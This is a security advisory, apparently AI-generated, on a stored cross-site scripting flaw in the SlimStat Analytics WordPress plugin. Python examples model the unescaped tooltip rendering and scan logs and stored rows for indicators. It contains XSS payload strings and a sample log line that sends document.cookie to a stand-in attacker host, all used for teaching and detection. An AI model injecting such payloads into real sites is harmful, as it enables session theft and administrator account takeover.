CVE-2026-7634 Overview
CVE-2026-7634 is a Stored Cross-Site Scripting (XSS) vulnerability [CWE-79] in the SlimStat Analytics plugin for WordPress. The flaw affects all versions up to and including 5.4.11. The plugin fails to properly sanitize and escape the User-Agent HTTP header before persisting and rendering it within the WordPress admin interface. Unauthenticated attackers can inject arbitrary JavaScript that executes when a user views the affected report page. Exploitation requires that an administrator explicitly enable the show_complete_user_agent_tooltip setting, which is disabled by default.
Critical Impact
Unauthenticated attackers can inject persistent JavaScript payloads that execute in administrator browsers, enabling session theft, account takeover, and arbitrary actions in the WordPress dashboard. The impact is bounded by the precondition above: the payload is stored on every affected install, but it only renders on sites where the non-default show_complete_user_agent_tooltip setting has been turned on.
Affected Products
- SlimStat Analytics plugin for WordPress, versions through 5.4.11
- WordPress sites running the plugin with the show_complete_user_agent_tooltip setting enabled (it is disabled by default); installs with the default setting still store the injected header but do not render it
Discovery Timeline
- 2026-05-28 - CVE-2026-7634 published to NVD
- 2026-05-28 - Last updated in NVD database
Technical Details for CVE-2026-7634
Vulnerability Analysis
The vulnerability resides in SlimStat Analytics' visitor tracking pipeline. The plugin ingests the User-Agent request header from incoming HTTP traffic and stores it for later display in analytics reports. Because the plugin performs neither sufficient input sanitization on write nor adequate output escaping on render, attacker-controlled markup persists end-to-end through the data flow. Relevant code paths include the tracker Processor.php and Storage.php modules that record visit metadata, and the wp-slimstat-reports.php view that renders the complete user-agent tooltip. When an administrator has enabled the tooltip feature, the stored payload is injected into the report DOM and executed in the administrator's authenticated session context.
Root Cause
The root cause is missing output escaping in the report view that renders the full user-agent string inside a tooltip element. The header value passes through Browscap.php parsing into persistent storage unchanged, and the view then emits it without HTML-context encoding at the rendering boundary: WordPress helpers such as esc_attr() (for attribute values) or esc_html() (for text nodes) are not applied where the value is reflected in the report markup, so the browser parses attacker-supplied quotes and tags as markup rather than as data.
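The following Python model illustrates the rendering-boundary point above. It is an added example, not the plugin's code: the tooltip markup, the function names and the User-Agent strings are all constructed for the demonstration, and html.escape(quote=True) stands in for WordPress esc_attr(). The parser step shows what a browser's tokenizer would make of each rendering, including an attribute-breakout payload that contains no angle brackets at all.

```python
from __future__ import annotations

import html
from html.parser import HTMLParser

# Constructed User-Agent strings for the demonstration; none is from a real capture.
BENIGN_UA = "Mozilla/5.0 (X11; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0"
# Closes the quoted attribute and injects a new element with an event handler.
TAG_INJECTION_UA = 'Mozilla/5.0 "><img src=x onerror=alert(document.cookie)> Safari/537.36'
# Closes the quoted attribute and adds a handler to the tooltip element itself: no angle brackets.
ATTR_INJECTION_UA = 'Mozilla/5.0 " onmouseover="alert(1)'


def render_tooltip_vulnerable(user_agent: str) -> str:
    """Stand-in for the flawed pattern the advisory describes: the stored header value is
    interpolated into the tooltip markup with no HTML-context encoding.
    (Illustrative markup, not the plugin's actual template.)"""
    return f'<span class="slimstat-tooltip" title="{user_agent}">UA</span>'


def render_tooltip_fixed(user_agent: str) -> str:
    """Same markup, escaped at the rendering boundary in the attribute context.
    html.escape(quote=True) encodes & < > " and ', the Python analogue of esc_attr()."""
    return f'<span class="slimstat-tooltip" title="{html.escape(user_agent, quote=True)}">UA</span>'


class _TagCollector(HTMLParser):
    """Records every start tag and its attributes, roughly as a browser tokenizer would.
    Attribute values come back entity-decoded, so escaped output round-trips to the original."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[tuple[str, dict]] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_tags(markup: str) -> list[tuple[str, dict]]:
    parser = _TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


def is_injected(markup: str) -> bool:
    """True if the rendered tooltip parses to anything other than one <span> carrying
    exactly the class and title attributes the template wrote."""
    tags = parse_tags(markup)
    if len(tags) != 1:
        return True
    tag, attrs = tags[0]
    return tag != "span" or set(attrs) != {"class", "title"}


if __name__ == "__main__":
    cases = [("benign", BENIGN_UA), ("tag injection", TAG_INJECTION_UA), ("attribute injection", ATTR_INJECTION_UA)]
    for label, ua in cases:
        vuln = is_injected(render_tooltip_vulnerable(ua))
        fixed = is_injected(render_tooltip_fixed(ua))
        print(f"{label:20} vulnerable_markup_injected={vuln!s:5} fixed_markup_injected={fixed}")
```

The parsed title attribute of the fixed rendering equals the original stored string, which is the point of escaping at output: the data can stay as-is in the database, and the browser still sees it as text, not markup.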
Attack Vector
An unauthenticated remote attacker sends an HTTP request to any page tracked by SlimStat with a malicious User-Agent header containing JavaScript payloads. The malicious string is stored in the analytics database. When a logged-in administrator views the SlimStat report that renders the complete user-agent tooltip, the browser parses and executes the attacker's script. Exploitation is conditional on an administrator having enabled show_complete_user_agent_tooltip, which is off by default. See the Wordfence Vulnerability Report and the GitHub Pull Request for technical details.
Detection Methods for CVE-2026-7634
Indicators of Compromise
- HTTP requests carrying User-Agent headers that contain HTML tags, <script> elements, event handlers such as onerror=, or javascript: URIs.
- SlimStat database rows in the visit/browser tables with user-agent values that include angle brackets, quotes, or JavaScript keywords. Do not filter on angle brackets alone: an attribute-breakout payload (a closing quote followed by an event handler such as onmouseover=) contains none.
- Administrator browsers issuing unexpected requests to external hosts while a SlimStat report page under /wp-admin/ is open, consistent with exfiltration of session cookies or nonces.
- New or modified administrator accounts created shortly after an admin viewed SlimStat reports.
Detection Strategies
- Inspect web server access logs for inbound requests whose User-Agent header contains characters such as <, >, or strings matching common XSS payload patterns. Decode percent-encoding and the log writer's quote escaping (Apache writes \" for a literal quote) before matching, or encoded payloads will slip past the pattern.
- Query the SlimStat database tables for stored user-agent values containing HTML or script tokens and review them as suspect entries.
- Monitor browser console errors and Content Security Policy violation reports generated when administrators load SlimStat report pages; this requires a CSP with a report-uri or report-to directive on the admin pages, and only catches payloads the policy actually blocks.
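The detection logic behind the first two strategies, run over sample data, as an added example that is not part of the original advisory or the plugin. The log lines and database rows are constructed for the demo; the "user_agent" column name is an assumption about SlimStat's schema, so map it to the real column on your install. The same indicator check serves both the access-log scan and the stored-data scan, and it decodes percent-encoding and log escaping first so that the encoded payload on the third line and the bracket-free attribute breakout in the second row are both caught.

```python
import html
import re
from urllib.parse import unquote

# Constructed "combined" format access log lines (not a real capture). Line 2 carries a
# tag-injection payload with the quote escaped as \" the way Apache writes it; line 3 is percent-encoded.
SAMPLE_LOG_LINES = r'''
203.0.113.7 - - [28/May/2026:10:15:32 +0000] "GET /blog/post-1/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0 Safari/537.36"
203.0.113.9 - - [28/May/2026:10:16:01 +0000] "GET /blog/post-1/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0 \"><img src=x onerror=fetch('https://attacker.example/?c='+document.cookie)>"
198.51.100.4 - - [28/May/2026:10:17:45 +0000] "GET / HTTP/1.1" 200 3020 "-" "Mozilla/5.0 %3Cscript%3Ealert(1)%3C/script%3E"
198.51.100.5 - - [28/May/2026:10:18:10 +0000] "GET /about/ HTTP/1.1" 200 2048 "-" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.18"
'''.strip().splitlines()

# Constructed rows standing in for SlimStat's stored visit data (e.g. the result of a SELECT).
# The column name "user_agent" is an assumption for the demo, not a verified schema detail.
SAMPLE_ROWS = [
    {"id": 1, "user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 Safari/605.1.15"},
    {"id": 2, "user_agent": 'Mozilla/5.0 " onmouseover="alert(1)'},  # attribute breakout, no angle brackets
]

# Apache/nginx combined log format; quoted fields may contain backslash-escaped characters.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>(?:[^"\\]|\\.)*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"\s*$'
)

# Indicator patterns matched against the decoded header value; insertion order is preserved in results.
INDICATORS = {
    "html_tag": re.compile(r"<\s*/?\s*[a-z!]", re.I),
    "event_handler": re.compile(r"\bon[a-z]+\s*=", re.I),
    "javascript_uri": re.compile(r"javascript\s*:", re.I),
    "script_api": re.compile(r"\b(?:alert|eval|fetch|prompt)\s*\(|document\.cookie", re.I),
}


def normalize(value: str) -> str:
    """Undo the encodings an attacker or the log writer may have applied:
    log-escaped quotes and backslashes, percent-encoding, HTML entities."""
    value = value.replace(r'\"', '"').replace('\\\\', '\\')
    return html.unescape(unquote(value))


def looks_like_xss(user_agent: str) -> list:
    """Names of the indicators that fire on the header value; empty list for a clean string."""
    norm = normalize(user_agent)
    return [name for name, rx in INDICATORS.items() if rx.search(norm)]


def parse_combined_log_line(line: str):
    """Field dict for a combined-format line, or None if the line does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan_access_log(lines) -> list:
    """Requests whose User-Agent looks like an injection attempt, with the indicators that fired."""
    hits = []
    for line in lines:
        rec = parse_combined_log_line(line)
        if rec is None:
            continue
        indicators = looks_like_xss(rec["ua"])
        if indicators:
            hits.append({"ip": rec["ip"], "ts": rec["ts"], "ua": normalize(rec["ua"]), "indicators": indicators})
    return hits


def scan_stored_user_agents(rows, field: str = "user_agent") -> list:
    """Same check over rows already in the analytics store; these are the live payloads on an unpatched site."""
    suspect = []
    for row in rows:
        indicators = looks_like_xss(row[field])
        if indicators:
            suspect.append({"id": row["id"], "indicators": indicators})
    return suspect


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG_LINES):
        print(f'{hit["ip"]:15} {hit["indicators"]} {hit["ua"]}')
    for row in scan_stored_user_agents(SAMPLE_ROWS):
        print(f'row {row["id"]}: {row["indicators"]}')
```

The ids returned by scan_stored_user_agents are the rows to review and purge under the mitigation steps; the ip values from scan_access_log are candidates for WAF blocking and for correlating with the time an administrator opened the report.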
Monitoring Recommendations
- Enable a Web Application Firewall (WAF) rule set that inspects and blocks malicious User-Agent header content before requests reach WordPress. This stops new injections only; payloads already stored in the analytics tables are unaffected and still render on a vulnerable install.
- Alert on administrator account creation, role changes, and plugin configuration modifications originating from the WordPress admin context.
- Audit usage of the SlimStat show_complete_user_agent_tooltip setting across managed sites and flag environments where it is enabled.
How to Mitigate CVE-2026-7634
Immediate Actions Required
- Update the SlimStat Analytics plugin to a version newer than 5.4.11 that includes the fix from GitHub Pull Request #297.
- Disable the show_complete_user_agent_tooltip setting in the SlimStat configuration until the plugin is patched.
- Review stored analytics data and purge user-agent records containing HTML or script content; on an unpatched install every such row is a live payload that fires the next time the tooltip report is opened.
- Rotate WordPress administrator credentials and invalidate active sessions if exploitation is suspected.
Patch Information
The maintainers addressed the issue in the SlimStat Analytics repository. Review the GitHub Pull Request for the upstream code change, and consult the Wordfence Vulnerability Report for vendor-confirmed fixed versions. Apply the update through the WordPress plugin manager or via WP-CLI on all affected sites.
Workarounds
- Keep the show_complete_user_agent_tooltip setting disabled, which prevents rendering of the stored payload.
- Deploy a WAF rule that strips or blocks User-Agent headers containing HTML, JavaScript URIs, or event handler attributes.
- Restrict access to the WordPress /wp-admin/ interface by IP allowlist. This does not stop the payload from executing, since the administrator's own browser renders it, but it limits what a stolen session cookie is worth to an attacker connecting from outside the allowlist.
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.